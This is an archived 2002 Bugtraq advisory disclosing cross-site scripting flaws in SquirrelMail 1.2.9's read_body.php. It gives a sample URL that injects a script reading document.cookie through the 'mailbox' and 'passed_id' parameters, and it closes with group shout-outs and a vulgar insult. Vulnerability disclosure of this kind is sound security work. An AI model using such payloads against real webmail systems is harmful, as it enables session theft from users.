Bugtraq mailing list archives

SquirrelMail v1.2.9 XSS bugs

From: "euronymous" <just-a-user () yandex ru>
Date: Tue, 3 Dec 2002 07:28:14 +0300 (MSK)

=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
topic: SquirrelMail v1.2.9 XSS bugs
product: SquirrelMail v1.2.9
vendor: www.squirrelmail.org
risk: low
date: 12/3/2k2
discovered by: euronymous /F0KP /HACKRU Team
advisory url: http://f0kp.iplus.ru/bz/008.txt 
=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=:=:=::=
              
description
-----------
when reading some email you can to insert the scripting code..
read_body.php dont make filtering users input in `mailbox' and
`passed_id' variables. btw, today has released v1.2.10. im dont
know if this version contains this xss.

sample attack
-------------
http://hostname/src/read_body.php?mailbox=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&passed_id=
%3Cscript%3Ealert(document.cookie)%3C%2Fscript%3E&
startMessage=1&show_more=0

[it must be in a single string]

not URL-encoded string working fine also.

shouts: HACKRU Team, DWC, DHG, Spoofed Packet, all 
russian security guyz!! 
fuck_off: slavomira and other dirty ppl in *.kz

================
im not a lame,
not yet a hacker
================

Current thread:

SquirrelMail v1.2.9 XSS bugs euronymous (Dec 03)
- Re: SquirrelMail v1.2.9 XSS bugs Jonathan Angliss (Dec 05)